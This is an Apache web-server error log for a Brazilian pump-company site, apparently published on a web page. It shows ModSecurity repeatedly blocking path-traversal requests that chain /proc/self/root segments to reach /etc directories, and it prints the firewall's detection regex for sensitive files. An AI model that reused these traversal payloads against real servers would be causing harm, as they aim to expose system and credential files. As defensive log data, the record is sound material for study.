https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:57:30.459659 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.128:36980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyKgeiSKl8TjouI-YphwAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:57:34.146370 2026] [proxy_fcgi:error] [pid 18380:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46160] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:57:34.467707 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:38696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyLnIk7brgkOH-rIWeGQAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:44.932886 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:41480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyOHIk7brgkOH-rIWeHQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:55.319616 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.241.31:40318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyQweiSKl8TjouI-YpjAAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:56.085881 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46714] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:57:57.105887 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.243.128:36996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyRRj0p0SRWAqcjGGLIwAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:58:01.884843 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.128:38810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmySa4xEDsg_V3ESNZdOgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:06.044670 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:52000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyTta6ubjKNq_cu4YZ6AAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:16.039785 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:54926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyWAeiSKl8TjouI-YpkgAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:19.133802 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47404] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:58:26.347790 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:50246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyYgeiSKl8TjouI-YplgAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:37.180686 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:39606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmybMU6Sx0TG1YjmQjAewAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:41.158081 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47892] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:58:46.759098 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:57734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmydnIk7brgkOH-rIWeOAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:58:57.479382 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:58548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmygXIk7brgkOH-rIWePwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:05.130110 2026] [proxy_fcgi:error] [pid 19507:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:59:07.670256 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:40362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyi_PqhzTj3BvfDX-ZgwAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:15.594521 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.244.43:45200] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmyk6BJNF7axNlVR0UqhwAAABU"]
[Tue Mar 17 16:59:27.125855 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:59:29.015506 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:53396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyoXIk7brgkOH-rIWeTgAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:32.806489 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.243.128:38816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmypPPqhzTj3BvfDX-ZkgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:39.414001 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:48720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyqtY0UrI5A3LftIwPNAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:47.250934 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:37520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmysxj0p0SRWAqcjGGLRQAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:59:52.339446 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.228.61:38962] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmyuIh-PF_25v4hFRB9HAAAAQA"]
[Tue Mar 17 16:59:55.148529 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49742] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:59:56.792207 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:37526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyvIh-PF_25v4hFRB9HwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:00:06.234260 2026] [mime_magic:error] [pid 25836:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:60763] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 17:00:08.606417 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.128:43226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyyAeiSKl8TjouI-YpzwAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
